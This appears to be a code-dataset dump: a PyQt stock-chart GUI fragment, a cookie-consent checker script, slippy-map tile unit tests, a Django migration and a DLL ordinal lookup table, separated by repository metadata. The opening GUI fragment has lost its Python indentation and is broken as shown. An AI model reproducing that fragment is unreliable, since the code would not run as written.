                if (datetime.now()-history).total_seconds()<43200: #less than 12 hours have elapsed since the last update
print("Less than 12 hours. Loading previously saved Json...")
#with open("time","w") as infile: #update time
#cPickle.dump(datetime.now(),infile)
else:
print("More than 12 hours. Updating Json...")
data = ts.get_industry_classified()
                    #data.to_json(cwd + "/class.json", orient="columns")#writes class data so no need to call Tushare again
with open("class.json","w+") as outfile:
cPickle.dump(data,outfile)
now = datetime.now()
with open("time", "w+") as outfile: #update time
cPickle.dump(now, outfile)
else:
print("No json found!") #If this is first time using tuchart in this directory
data = df()
data = ts.get_industry_classified()
#var = data.to_json(cwd+"/class.json",orient="columns")
with open('class.json', 'w+') as outfile: #records json
cPickle.dump(data, outfile)
now = datetime.now()
with open("time", "w+") as outfile:
cPickle.dump(now,outfile)
with open("class.json", "r") as infile: # reads current time
series = cPickle.load(infile)
#series = pd.read_json(cwd + "\\class.json")
#series = ts.get_industry_classified()
series = pd.DataFrame(series)
curdate = time.strftime("%Y/%m/%d") #gets current time to put into dateedit
dateobj = datetime.strptime(curdate, "%Y/%m/%d")#converts to datetime object
past = dateobj - timedelta(days = 7) #minus a week to start date
pasttime = datetime.strftime(past, "%Y/%m/%d")
QPast = QDate.fromString(pasttime,"yyyy/MM/dd") #convert to qtime so that widget accepts the values
Qcurdate = QDate.fromString(curdate,"yyyy/MM/dd")
list1 = series["c_name"].tolist() #Get industry categories. Filters out redundant ones
list1 = list(set(list1))
#w = database()
#zsparent = QTreeWidgetItem(self.ui.treeWidget)
#zsparent.setText(0,"股票指数")
#zsnames =["上证指数-sh","深圳成指-sz","沪深300指数-hs300","上证50-"]
zsparent = QTreeWidgetItem(self.ui.treeWidget)
zsparent.setText(0, "股票指数")
zsnames = ["上证指数-sh", "深圳成指-sz", "沪深300指数-hs300", "上证50-sz50", "中小板-zxb", "创业板-cyb"]
for k in zsnames:
child = QTreeWidgetItem(zsparent)
child.setText(0, k)
for j in list1:
parent = QTreeWidgetItem(self.ui.treeWidget) #populate treewidget with names
parent.setText(0,j)
var = series.loc[series["c_name"] == j]
list2 = var["code"].tolist()
name = var["name"].tolist()
#var = showcollection(i) #Display database items
for idx,val in enumerate(list2):
child = QTreeWidgetItem(parent)
child.setText(0, name[idx]+"-"+str(val))
#for i in Drag:
#grandson = QTreeWidgetItem(child) #Commented out because increases program response time
#grandson.setText(0, i)
#self.ui.treeWidget.itemDoubleClicked.connect(self.onClickItem) #Display Collection items
self.ui.treeWidget.setContextMenuPolicy(Qt.CustomContextMenu)
self.ui.treeWidget.customContextMenuRequested.connect(self.openMenu)
#self.ui.widget.setGeometry(QtCore.QRect(0, 30,1550, 861))
file_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "render.html")) #path to read html file
local_url = QUrl.fromLocalFile(file_path)
self.ui.widget.load(local_url)
self.ui.commandLinkButton.setFixedSize(50, 50)
self.ui.commandLinkButton.clicked.connect(self.classify) #when the arrow button is clicked, trigger events
#self.ui.commandLinkButton.clicked.connect(lambda action: self.classify(action, self.ui.treewidget))
# QSizePolicy
try:
retain_size = self.ui.dateEdit_2.sizePolicy()
retain_size.setRetainSizeWhenHidden(True)
self.ui.dateEdit_2.setSizePolicy(retain_size)
retain_size = self.ui.comboBox.sizePolicy()
retain_size.setRetainSizeWhenHidden(True)
self.ui.comboBox.setSizePolicy(retain_size)
retain_size = self.ui.label_2.sizePolicy()
retain_size.setRetainSizeWhenHidden(True)
self.ui.label_2.setSizePolicy(retain_size)
except AttributeError:
print("No PYQT5 Binding! Widgets might be deformed")
self.ui.dateEdit.setDate(QPast)
self.ui.dateEdit_2.setDate(Qcurdate)#populate widgets
self.ui.dateEdit.setCalendarPopup(True)
self.ui.dateEdit_2.setCalendarPopup(True)
self.ui.comboBox.addItems(["D", "W", "M", "5", "15", "30", "60"])
self.ui.treeWidget_2.setDragDropMode(self.ui.treeWidget_2.InternalMove)
self.ui.treeWidget_2.setContextMenuPolicy(Qt.CustomContextMenu)
self.ui.treeWidget_2.customContextMenuRequested.connect(self.openWidgetMenu)
#self.ui.toolbutton.clicked.connect(lambda action: self.graphmerge(action, CombineKeyword))
self.ui.combobox.currentIndexChanged.connect(self.modifycombo)
def modifycombo(self):
if self.ui.combobox.currentText()==u"复权": #if 复权 is selected, clear all existing queries to avoid value conflict
self.ui.label_2.show()
self.ui.dateEdit_2.show()
self.ui.comboBox.show()
self.ui.comboBox.clear()
self.ui.comboBox.addItems(["hfq", "qfq"])
self.ui.treeWidget_2.clear()
if self.ui.combobox.currentText()==u"K线":
self.ui.label_2.show()
self.ui.dateEdit_2.show()
self.ui.comboBox.show()
self.ui.comboBox.clear()
self.ui.comboBox.addItems(["D", "W", "M", "5", "15", "30", "60"])#same as above
self.ui.treeWidget_2.clear()
if self.ui.combobox.currentText()==u"分笔数据":
self.ui.comboBox.hide()
self.ui.label_2.hide()
self.ui.dateEdit_2.hide()
self.ui.treeWidget_2.clear()
if self.ui.combobox.currentText()==u"历史分钟":
self.ui.comboBox.show()
self.ui.comboBox.clear()
self.ui.comboBox.addItems(["1min","5min","15min","30min","60min"])
self.ui.label_2.hide()
self.ui.dateEdit_2.hide()
self.ui.treeWidget_2.clear()
if self.ui.combobox.currentText()==u"十大股东":
self.ui.comboBox.hide()
self.ui.label_2.hide()
self.ui.dateEdit_2.hide()
self.ui.treeWidget_2.clear()
def graphmerge(self, combineKeyword):
sth = ""
for i in combineKeyword:
if sth == "":
sth = sth + i
else :
sth = sth + "\n" + "&"+ "-"+i
list1 = sth
return sth
global CombineKeyword
CombineKeyword = []
self.ui.listwidget.clear() #combine stuff so that different graphs can be drawn together
def kstuff(self):
return 0
def openWidgetMenu(self,position):
indexes = self.ui.treeWidget_2.selectedIndexes()
item = self.ui.treeWidget_2.itemAt(position)
if item == None:
return
#item = self.ui.listWidget.itemAt(position)
if len(indexes) > 0:
menu = QMenu()
menu.addAction(QAction("Delete", menu,checkable = True))#This function is perhaps useless
#menu.triggered.connect(self.eraseItem)
item = self.ui.treeWidget_2.itemAt(position)
#collec = str(item.text())
menu.triggered.connect(lambda action: self.ListMethodSelected(action, item))
menu.exec_(self.ui.treeWidget_2.viewport().mapToGlobal(position))
def ListMethodSelected(self, action, item):
if action.text() == "Delete":
self.eraseItem()
if action.text() == "Combine":
global CombineKeyword
collec = str(item.text())
CombineKeyword.append(collec)#Useless function(maybe?)
list1 = [self.tr(collec)]
self.ui.listwidget.addItems(list1)
self.eraseItem()
def methodSelected(self, action, collec):
#print(action.text()) #Choice
#if (self.ui.treewidget.count() == 5):
# self.ui.label.setText("Maximum number of queries")
# return
#self.ui.label.setText("")
Choice = action.text()
Stock = collec
#print(collec) #Stock Name
#print(db_origin) #DataBase name
#list1 = [self.tr(Stock+"-"+Choice+"-"+db_origin)]
#self.ui.treewidget.addItems(list1)
parent = QTreeWidgetItem(self.ui.treeWidget_2)
parent.setText(0, Stock.decode("utf-8")+"-"+Choice)
font = QtGui.QFont("Times", 12, QtGui.QFont.Bold)
self.ui.treeWidget_2.setFont(font)
def eraseItem(self):
        for x in self.ui.treeWidget_2.selectedItems():#delete via the right-click menu
#item = self.ui.treewidget.takeItem(self.ui.treewidget.currentRow())
sip.delete(x)
#item.delete
def classify(self, folder):
items = []
startdate = self.ui.dateEdit.date()
startdate = startdate.toPyDate()
startdate = startdate.strftime("%Y/%m/%d")#converts date from dateedit to tushare readable date
enddate = self.ui.dateEdit_2.date()
enddate = enddate.toPyDate()
enddate = enddate.strftime("%Y/%m/%d")
option = self.ui.comboBox.currentText()
option = str(option)
#if (self.ui.treewidget) == 0:
#self.ui.label.setText("Need to select at least one query")
#return
root = self.ui.treeWidget_2.invisibleRootItem()# This is for iterating child items
child_count = root.childCount()
if child_count==0:
return
for i in range(child_count):
if root.child(i).child(0):
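                # a node with children is a merged query: combine the parent label with all of its child labels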
array = []
temp = root.child(i)
#mergelist = self.recurse(temp,array)
#print(mergelist)
parent = root.child(i).text(0)
mergelist = []
for j in range(temp.childCount()):
while temp.child(j).childCount()!=0:
#self.ui.label.setText("Error: Invalid Tree!")
return
txt = temp.child(j).text(0)
mergelist.append(txt)
mergelist.insert(0,parent)
url = self.graphmerge(mergelist)
items.append(url)
else:
item = root.child(i)
url = item.text(0)
items.append(url)
labels = [k for k in items]
items = ([x.encode("utf-8") for x in labels])
width = self.ui.widget.width()#give width and height of user's screen so that graphs can be generated with dynamic size
height = self.ui.widget.height()
        graphpage(labels, startdate,enddate,option,width, height)#labels: 复权 (adjusted), K线 (candlestick) or 分笔 (tick); option: hfq, qfq or 15, 30, D, etc.
self.ui.widget.reload()#refreshes webengine
self.ui.widget.repaint()
self.ui.widget.update()
def openMenu(self,position):
indexes = self.ui.treeWidget.selectedIndexes()
item = self.ui.treeWidget.itemAt(position)
db_origin = ""
#if item.parent():
# db_origin = item.parent().text(0)
collec = str(item.text(0).encode("utf-8"))
if len(indexes) > 0:
level = 0
index = indexes[0]
while index.parent().isValid():
index = index.parent()
level = level + 1
menu = QMenu()
#print((collec, db_origin))
if level ==0:
pass
else:
#keyarray = GetKeys(collec, db_origin)
#if "Open" in keyarray:
if self.ui.combobox.currentText()==u"K线":
menu.addAction(QAction("Kline", menu, checkable=True))
menu.addAction(QAction("Open", menu, checkable=True))
menu.addAction(QAction("Close", menu, checkable=True))#open up different menu with different kind of graphs
menu.addAction(QAction("High", menu, checkable=True))
menu.addAction(QAction("Low", menu, checkable=True))
menu.addAction(QAction("Volume", menu, checkable=True))
#menu.addAction(QAction("P_change", menu, checkable=True))
#menu.addAction(QAction("Turnover",menu,checkable=True))
if self.ui.combobox.currentText()==u"复权":
menu.addAction(QAction("Kline", menu, checkable=True))
menu.addAction(QAction("Open", menu, checkable=True))
menu.addAction(QAction("Close", menu, checkable=True))
menu.addAction(QAction("High", menu, checkable=True))
menu.addAction(QAction("Low", menu, checkable=True))
menu.addAction(QAction("Volume", menu, checkable=True))
menu.addAction(QAction("Amount", menu, checkable=True))
if self.ui.combobox.currentText()==u"分笔数据":
menu.addAction(QAction("分笔", menu, checkable=True))
if self.ui.combobox.currentText()==u"历史分钟":
menu.addAction(QAction("Kline", menu, checkable=True))
menu.addAction(QAction("Open", menu, checkable=True))
menu.addAction(QAction("Close", menu, checkable=True))
menu.addAction(QAction("High", menu, checkable=True))
menu.addAction(QAction("Low", menu, checkable=True))
menu.addAction(QAction("Volume", menu, checkable=True))
menu.addAction(QAction("Amount", menu, checkable=True))
if self.ui.combobox.currentText()==u"十大股东":
menu.addAction(QAction("季度饼图", menu, checkable=True))
#menu.addAction(QAction("持股比例", menu, checkable=True))
#for g in keyarray:
#menu.addAction(QAction(g, menu, checkable=True))
menu.triggered.connect(lambda action: self.methodSelected(action, collec))
menu.exec_(self.ui.treeWidget.viewport().mapToGlobal(position))
app = QApplication(sys.argv)
w = MyUi()
w.show()
sys.exit(app.exec_())
| 45.142442
| 127
| 0.586902
|
573e2b8dce3e4e86b7731c5aa1c96bd6798148fa
| 306
|
py
|
Python
|
test.py
|
Dr3xler/CookieConsentChecker
|
816cdfb9d9dc741c57dbcd5e9c9ef59837196631
|
[
"MIT"
] | null | null | null |
test.py
|
Dr3xler/CookieConsentChecker
|
816cdfb9d9dc741c57dbcd5e9c9ef59837196631
|
[
"MIT"
] | 3
|
2021-04-29T22:57:09.000Z
|
2021-05-03T15:32:39.000Z
|
test.py
|
Dr3xler/CookieConsentChecker
|
816cdfb9d9dc741c57dbcd5e9c9ef59837196631
|
[
"MIT"
] | 1
|
2021-08-29T09:53:09.000Z
|
2021-08-29T09:53:09.000Z
|
from core import file_handling as file_h, driver_handling as driver_h
from website_handling import collect_websites as collect
websites = file_h.website_reader_cookie_websites()
driver = driver_h.webdriver_setup()
#idcac_poc.addon_check(driver, websites)
collect.generate_success_list(driver, websites)
| 30.6
| 69
| 0.849673
|
fa69bd7d7c68df58c1e6190ea72750add1635a1f
| 8,184
|
py
|
Python
|
datanode/src/slippy_util_test.py
|
airmap/InterUSS-Platform
|
fa19af360826b4dd7b841013c0c569a4f282919d
|
[
"Apache-2.0"
] | null | null | null |
datanode/src/slippy_util_test.py
|
airmap/InterUSS-Platform
|
fa19af360826b4dd7b841013c0c569a4f282919d
|
[
"Apache-2.0"
] | 1
|
2021-03-26T12:13:17.000Z
|
2021-03-26T12:13:17.000Z
|
datanode/src/slippy_util_test.py
|
isabella232/InterUSS-Platform
|
fa19af360826b4dd7b841013c0c569a4f282919d
|
[
"Apache-2.0"
] | 2
|
2019-08-11T20:20:32.000Z
|
2021-03-26T12:01:43.000Z
|
"""Test of the InterUSS Platform Data Node slippy utilities.
Copyright 2018 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import slippy_util
class InterUSSSlippyUtilitiesTestCase(unittest.TestCase):
def testValidateSlippy(self):
pass
def testValidCSVConversions(self):
self.assertEqual([(0.0, 0.0)], slippy_util.convert_csv_to_coordinates('0,0'))
self.assertEqual([(40.0, 0.0)], slippy_util.convert_csv_to_coordinates('40,0'))
self.assertEqual([(40.4, 0.0)],
slippy_util.convert_csv_to_coordinates('40.4,0'))
self.assertEqual([(40.4, 110.0)],
slippy_util.convert_csv_to_coordinates('40.4,110'))
self.assertEqual([(40.4, 110.1)],
slippy_util.convert_csv_to_coordinates('40.4,110.1'))
def testInvalidCSVConversions(self):
with self.assertRaises(TypeError):
slippy_util.convert_csv_to_coordinates(None)
with self.assertRaises(TypeError):
slippy_util.convert_csv_to_coordinates(0)
with self.assertRaises(TypeError):
slippy_util.convert_csv_to_coordinates('')
with self.assertRaises(ValueError):
slippy_util.convert_csv_to_coordinates('1')
with self.assertRaises(ValueError):
slippy_util.convert_csv_to_coordinates('10 100')
with self.assertRaises(ValueError):
slippy_util.convert_csv_to_coordinates('COORDS')
with self.assertRaises(ValueError):
slippy_util.convert_csv_to_coordinates('10,C')
with self.assertRaises(ValueError):
slippy_util.convert_csv_to_coordinates('91,10')
with self.assertRaises(ValueError):
slippy_util.convert_csv_to_coordinates('10,191')
with self.assertRaises(ValueError):
slippy_util.convert_csv_to_coordinates('10,11,12')
def testConversionOfTilesToPolygons(self):
pass
def testValidPointConversions(self):
self.assertEqual((0, 0), slippy_util.convert_point_to_tile(0, 0, 0))
self.assertEqual((1, 1), slippy_util.convert_point_to_tile(1, 0, 0))
self.assertEqual((2, 2), slippy_util.convert_point_to_tile(2, 0, 0))
self.assertEqual((3, 1), slippy_util.convert_point_to_tile(2, 34, 110))
self.assertEqual((412, 204), slippy_util.convert_point_to_tile(9, 34, 110))
self.assertEqual((412, 307), slippy_util.convert_point_to_tile(9, -34, 110))
self.assertEqual((99, 307), slippy_util.convert_point_to_tile(9, -34, -110))
self.assertEqual((99, 204), slippy_util.convert_point_to_tile(9, 34, -110))
def testInvalidPointConversions(self):
with self.assertRaises(ValueError):
slippy_util.convert_point_to_tile(-1, 0, 0)
with self.assertRaises(ValueError):
slippy_util.convert_point_to_tile(21, 0, 0)
with self.assertRaises(ValueError):
slippy_util.convert_point_to_tile(1, 91, 10)
with self.assertRaises(ValueError):
slippy_util.convert_point_to_tile(1, 10, 191)
with self.assertRaises(TypeError):
slippy_util.convert_point_to_tile(1, 10, None)
with self.assertRaises(ValueError):
slippy_util.convert_path_to_tiles(0, [(0, 0)])
with self.assertRaises(OverflowError):
slippy_util.convert_path_to_tiles(15, [(0, 0), (1, 1.5)])
def testValidPathConversions(self):
self.assertEqual(1,
len(slippy_util.convert_path_to_tiles(0, [(0, 0), (1, 1.5)])))
self.assertEqual(2,
len(slippy_util.convert_path_to_tiles(5, [(0, 0), (1, 1.5)])))
    # One segment should be the same as two segments that overlap
self.assertEqual(len(slippy_util.convert_path_to_tiles(10, [(0, 0), (1, 1.5)])),
len(slippy_util.convert_path_to_tiles(10, [(0, 0), (1, 1.5),
(0, 0)])))
    # 4 points are in 4 separate grids,
    # and there are 2 more grids lying under the path
self.assertEqual(6, len(
slippy_util.convert_path_to_tiles(9, [(47.5, -103), (47.5, -102.5),
(48, -102.5), (48, -103),
(47.5, -103)])))
    # Corner-cutting case: the two points lie in two grids, but the segment
    # cuts across the corner of a third grid, which should also be included
self.assertEqual(3, len(
slippy_util.convert_path_to_tiles(
9, [(37.936541030367316, -122.377713074509),
(37.69672993401783, -122.10422390269278)])))
def testInvalidPathConversions(self):
with self.assertRaises(TypeError):
slippy_util.convert_path_to_tiles(0, None)
with self.assertRaises(TypeError):
slippy_util.convert_path_to_tiles(0, 0)
with self.assertRaises(TypeError):
slippy_util.convert_path_to_tiles(0, '0,0,1,1.5')
with self.assertRaises(ValueError):
slippy_util.convert_path_to_tiles(0, [])
with self.assertRaises(TypeError):
slippy_util.convert_path_to_tiles(0, [(0), (1)])
    # test a calculation that would span a very large number of tiles
with self.assertRaises(OverflowError):
slippy_util.convert_polygon_to_tiles(15, [(47.5, -103), (47.5, -101.8),
(48, -101.8), (48, -103),
(47.5, -103)])
def testValidPolygonConversions(self):
self.assertEqual(1, len(
slippy_util.convert_polygon_to_tiles(0, [(0, 0), (1, 1.5), (2, 0), (0, 0)])))
self.assertEqual(2, len(
slippy_util.convert_polygon_to_tiles(5, [(0, 0), (1, 1.5), (2, 0), (0, 0)])))
# check auto closing
self.assertEqual(
slippy_util.convert_polygon_to_tiles(9, [(0, 0), (1, 1.5), (2, 0)]),
slippy_util.convert_polygon_to_tiles(9, [(0, 0), (1, 1.5), (2, 0), (0, 0)]))
    # 4 points are in 4 separate grids,
    # and there are 4 more grids under the path, plus 1 grid fully enclosed
self.assertEqual(9, len(
slippy_util.convert_polygon_to_tiles(9, [(47.5, -103), (47.5, -101.8),
(48, -101.8), (48, -103),
(47.5, -103)])))
def testInvalidPolygonConversions(self):
with self.assertRaises(TypeError):
slippy_util.convert_polygon_to_tiles(0, None)
with self.assertRaises(TypeError):
slippy_util.convert_polygon_to_tiles(0, 0)
with self.assertRaises(TypeError):
slippy_util.convert_polygon_to_tiles(0, '0,0,1,1.5')
with self.assertRaises(ValueError):
slippy_util.convert_polygon_to_tiles(0, [])
with self.assertRaises(ValueError):
slippy_util.convert_polygon_to_tiles(0, [(0), (1)])
def testSlippyConversionsForSpecialCases(self):
# 4x4 grid used for these tests at zoom 4
# 8,8 9,8 10,8 11,8
# 8,9 9,9 10,9 11,9
# 8,10 9,10 10,10 11,10
# 8,11 9,11 10,11 11,11
# points of interest
point_8x8 = (-19.808, 20.039)
point_8x11 = (-65.730, 19.160)
point_11x11 = (-58.263, 71.367)
point_11x8 = (-6.839, 82.441)
    # as a polygon, the four points cover all 16 tiles
self.assertEqual(16, len(
slippy_util.convert_polygon_to_tiles(
4, [point_8x8, point_8x11, point_11x11, point_11x8])))
    # as a path, only 10 tiles (the path is not closed)
self.assertEqual(10, len(
slippy_util.convert_path_to_tiles(
4, [point_8x8, point_8x11, point_11x11, point_11x8])))
# corner to corner should be 7
self.assertEqual(7, len(
slippy_util.convert_path_to_tiles(
4, [point_8x8, point_11x11])))
self.assertEqual(7, len(
slippy_util.convert_path_to_tiles(
4, [point_8x11, point_11x8])))
    # a triangle toward the bottom covers 11 tiles
self.assertEqual(11, len(
slippy_util.convert_polygon_to_tiles(
4, [point_11x8, point_8x11, point_11x11, point_11x8])))
| 43.301587
| 84
| 0.661901
|
12663adde6dee25c0714369e6ef31c046edf352b
| 570
|
py
|
Python
|
django_app/visitas_granada/migrations/0007_auto_20200619_1039.py
|
AngelValera/SSBW
|
7bcd1380b2406de7a4850a7e00b1428f2fb5c099
|
[
"MIT"
] | null | null | null |
django_app/visitas_granada/migrations/0007_auto_20200619_1039.py
|
AngelValera/SSBW
|
7bcd1380b2406de7a4850a7e00b1428f2fb5c099
|
[
"MIT"
] | 5
|
2020-06-18T16:30:42.000Z
|
2022-01-13T02:54:01.000Z
|
django_app/visitas_granada/migrations/0007_auto_20200619_1039.py
|
AngelValera/SSBW
|
7bcd1380b2406de7a4850a7e00b1428f2fb5c099
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.7 on 2020-06-19 08:39
import django.core.validators
from django.db import migrations
import sorl.thumbnail.fields
class Migration(migrations.Migration):
dependencies = [
('visitas_granada', '0006_auto_20200619_1036'),
]
operations = [
migrations.AlterField(
model_name='visita',
name='foto',
field=sorl.thumbnail.fields.ImageField(blank=True, upload_to='fotos', validators=[django.core.validators.FileExtensionValidator(allowed_extensions=['jpg', 'png'])]),
),
]
| 27.142857
| 177
| 0.67193
|
c9b12faec58d2939adc18b008f7e310703d46457
| 111,264
|
py
|
Python
|
s/sv221mn.py
|
byeongal/pefile_ordlookup
|
9400d24890601e4ec47f3b279b72f4fd9ca1d58d
|
[
"MIT"
] | null | null | null |
s/sv221mn.py
|
byeongal/pefile_ordlookup
|
9400d24890601e4ec47f3b279b72f4fd9ca1d58d
|
[
"MIT"
] | null | null | null |
s/sv221mn.py
|
byeongal/pefile_ordlookup
|
9400d24890601e4ec47f3b279b72f4fd9ca1d58d
|
[
"MIT"
] | null | null | null |
# md5 : e4d92ee9e51d571e98231351d2b9aa6d
# sha1 : f28d4e3190863734ac8a6759692cf3b5c9e210a8
# sha256 : a6939c20ced2c6ac4f4b0eb4294044094ab00c6303133c696ccdfb43d4bc3c16
ord_names = {
20: b'??0Link@@QAE@ABV0@@Z',
21: b'??0Link@@QAE@XZ',
22: b'??0Stack@@QAE@GG@Z',
23: b'??1Stack@@QAE@XZ',
24: b'??4Link@@QAEAAV0@ABV0@@Z',
25: b'?Call@Link@@QAEJPAX@Z',
26: b'?Count@Container@@QBEKXZ',
27: b'?Count@Stack@@QBEKXZ',
28: b'?GetObject@Stack@@QBEPAXK@Z',
29: b'?Pop@Stack@@QAEPAXXZ',
30: b'?Push@Stack@@QAEXPAX@Z',
31: b'?First@List@@QAEPAXXZ',
32: b'?Next@List@@QAEPAXXZ',
33: b'??0Date@@QAE@ABVResId@@@Z',
34: b'??0International@@QAE@ABVResId@@@Z',
35: b'??0ResMgr@@QAE@PAD@Z',
36: b'??0Resource@@QAE@ABVResId@@@Z',
37: b'??0String@@QAE@ABVResId@@@Z',
38: b'??0Time@@QAE@ABVResId@@@Z',
39: b'??1ResMgr@@QAE@XZ',
40: b'?Clear@STACK_TYPE@@QAEXPBVResource@@G@Z',
41: b'?GetClass@ResMgr@@QAEPAXXZ',
42: b'?GetId@ResId@@QBEGXZ',
43: b'?GetRT@ResId@@QBEFXZ',
44: b'?GetRemainSize@ResMgr@@QAEGXZ',
45: b'?GetRes@Resource@@QAEXABVResId@@@Z',
46: b'?GetResManager@Resource@@SGPAVResMgr@@XZ',
47: b'?GetResource@ResMgr@@QAEEFGPAURSHEADER_TYPE@@PBVResource@@@Z',
48: b'?GetStringSize@ResMgr@@SGGG@Z',
49: b'?GetStringSize@ResMgr@@SGGPAD@Z',
50: b'?GetpResource@ResId@@QBEPAURSHEADER_TYPE@@XZ',
51: b'?Increment@ResMgr@@QAEPAXG@Z',
52: b'?IncrementRes@Resource@@SGPAXG@Z',
53: b'?IsAvailable@ResMgr@@QBEEFGPAURSHEADER_TYPE@@PBVResource@@@Z',
54: b'?PopContext@ResMgr@@QAEXPBVResource@@@Z',
55: b'?SetRT@ResId@@QBEABV1@F@Z',
56: b'?SetResManager@Resource@@SGXPAVResMgr@@@Z',
57: b'?TestRes@Resource@@QAEXXZ',
58: b'?TestStack@ResMgr@@QAEXPBVResource@@@Z',
59: b'??0Color@@QAE@ABVResId@@@Z',
60: b'??8Color@@QBEEABV0@@Z',
61: b'??9Color@@QBEEABV0@@Z',
62: b'?ChangeBlue@Color@@QAEGG@Z',
63: b'?ChangeColorName@Color@@QAE?AW4ColorName@@W42@@Z',
64: b'?ChangeGreen@Color@@QAEGG@Z',
65: b'?ChangeRed@Color@@QAEGG@Z',
66: b'?GetBlue@Color@@QBEGXZ',
67: b'?GetClassRes@Resource@@SGPAXXZ',
68: b'?GetColBlue@@YGGW4ColorName@@@Z',
69: b'?GetColGreen@@YGGW4ColorName@@@Z',
70: b'?GetColRed@@YGGW4ColorName@@@Z',
71: b'?GetGreen@Color@@QBEGXZ',
72: b'?GetRed@Color@@QBEGXZ',
73: b'??0Brush@@QAE@ABV0@@Z',
74: b'??0Brush@@QAE@ABVBitmap@@@Z',
75: b'??0Brush@@QAE@ABVColor@@0W4BrushStyle@@@Z',
76: b'??0Brush@@QAE@ABVColor@@W4BrushStyle@@@Z',
77: b'??0Brush@@QAE@ABVResId@@@Z',
78: b'??0Brush@@QAE@W4BrushStyle@@@Z',
79: b'??0Brush@@QAE@XZ',
80: b'??0Color@@QAE@W4ColorName@@@Z',
81: b'??0Font@@QAE@ABV0@@Z',
82: b'??0Font@@QAE@ABVResId@@@Z',
83: b'??0Font@@QAE@ABVString@@ABVSize@@@Z',
84: b'??0Font@@QAE@W4FontFamily@@ABVSize@@@Z',
85: b'??0Font@@QAE@XZ',
86: b'??0Pair@@QAE@ABV0@@Z',
87: b'??0Pair@@QAE@FF@Z',
88: b'??0Pair@@QAE@XZ',
89: b'??0Pen@@QAE@ABV0@@Z',
90: b'??0Pen@@QAE@ABVColor@@GW4PenStyle@@@Z',
91: b'??0Pen@@QAE@ABVResId@@@Z',
92: b'??0Pen@@QAE@W4PenStyle@@@Z',
93: b'??0Pen@@QAE@XZ',
94: b'??0ResId@@QAE@PAURSHEADER_TYPE@@@Z',
95: b'??0Resource@@QAE@XZ',
96: b'??0Size@@QAE@ABV0@@Z',
97: b'??0Size@@QAE@FF@Z',
98: b'??0Size@@QAE@XZ',
99: b'??1Brush@@QAE@XZ',
100: b'??1Color@@QAE@XZ',
101: b'??1Font@@QAE@XZ',
102: b'??1Pen@@QAE@XZ',
103: b'??1Resource@@QAE@XZ',
104: b'??4Brush@@QAEAAV0@ABV0@@Z',
105: b'??4Font@@QAEAAV0@ABV0@@Z',
106: b'??4Pair@@QAEAAV0@ABV0@@Z',
107: b'??4Pen@@QAEAAV0@ABV0@@Z',
108: b'??4Size@@QAEAAV0@ABV0@@Z',
109: b'??8Brush@@QBEEABV0@@Z',
110: b'??8Font@@QBEEABV0@@Z',
111: b'??8Pair@@QBEEABV0@@Z',
112: b'??8Pen@@QBEEABV0@@Z',
113: b'??9Brush@@QBEEABV0@@Z',
114: b'??9Font@@QBEEABV0@@Z',
115: b'??9Pen@@QBEEABV0@@Z',
116: b'?ChangeAlign@Font@@QAE?AW4FontAlign@@W42@@Z',
117: b'?ChangeBitmap@Brush@@QAE?AVBitmap@@ABV2@@Z',
118: b'?ChangeCharOrientation@Font@@QAEFF@Z',
119: b'?ChangeCharSet@Font@@QAE?AW4CharSet@@W42@@Z',
120: b'?ChangeColor@Brush@@QAE?AVColor@@ABV2@@Z',
121: b'?ChangeColor@Font@@QAE?AVColor@@ABV2@@Z',
122: b'?ChangeColor@Pen@@QAE?AVColor@@ABV2@@Z',
123: b'?ChangeFamily@Font@@QAE?AW4FontFamily@@W42@@Z',
124: b'?ChangeFillColor@Brush@@QAE?AVColor@@ABV2@@Z',
125: b'?ChangeFillColor@Font@@QAE?AVColor@@ABV2@@Z',
126: b'?ChangeItalic@Font@@QAEEE@Z',
127: b'?ChangeLineOrientation@Font@@QAEFF@Z',
128: b'?ChangeName@Font@@QAE?AVString@@ABV2@@Z',
129: b'?ChangeOutline@Font@@QAEEE@Z',
130: b'?ChangePitch@Font@@QAE?AW4FontPitch@@W42@@Z',
131: b'?ChangeShadow@Font@@QAEEE@Z',
132: b'?ChangeSize@Font@@QAE?AVSize@@ABV2@@Z',
133: b'?ChangeStrikeout@Font@@QAE?AW4FontStrikeout@@W42@@Z',
134: b'?ChangeStyle@Brush@@QAE?AW4BrushStyle@@W42@@Z',
135: b'?ChangeStyle@Pen@@QAE?AW4PenStyle@@W42@@Z',
136: b'?ChangeTransparent@Brush@@QAEEE@Z',
137: b'?ChangeTransparent@Font@@QAEEE@Z',
138: b'?ChangeUnderline@Font@@QAE?AW4FontUnderline@@W42@@Z',
139: b'?ChangeWeight@Font@@QAE?AW4FontWeight@@W42@@Z',
140: b'?ChangeWidth@Pen@@QAEGG@Z',
141: b'?GetBitmap@Brush@@QBEABVBitmap@@XZ',
142: b'?GetObjSize@ResMgr@@SGGPAURSHEADER_TYPE@@@Z',
143: b'?GetObjSizeRes@Resource@@SGGPAURSHEADER_TYPE@@@Z',
144: b'?GetStringSizeRes@Resource@@SGGPAD@Z',
145: b'?IsHatched@Brush@@QBEEXZ',
146: b'?IsTransparent@Brush@@QBEEXZ',
147: b'??0FontMetric@@QAE@ABV0@@Z',
148: b'??0FontMetric@@QAE@XZ',
149: b'??1FontMetric@@QAE@XZ',
150: b'??4FontMetric@@QAEAAV0@ABV0@@Z',
151: b'??8FontMetric@@QBEEABV0@@Z',
152: b'??9FontMetric@@QBEEABV0@@Z',
153: b'?ExistChar@FontMetric@@QBEED@Z',
154: b'??0GDIMetaFile@@QAE@ABV0@@Z',
155: b'??0GDIMetaFile@@QAE@XZ',
156: b'??0Point@@QAE@XZ',
157: b'??1GDIMetaFile@@UAE@XZ',
158: b'??4GDIMetaFile@@QAEAAV0@ABV0@@Z',
159: b'??_7GDIMetaFile@@6B@',
160: b'??_GGDIMetaFile@@UAEPAXI@Z',
161: b'?AddGDIAction@GDIMetaFile@@QAEXPAVMetaAction@@@Z',
162: b'?ChangePrefMapMode@GDIMetaFile@@QAE?AVMapMode@@ABV2@@Z',
163: b'?ChangePrefPalette@GDIMetaFile@@QAE?AVPalette@@ABV2@@Z',
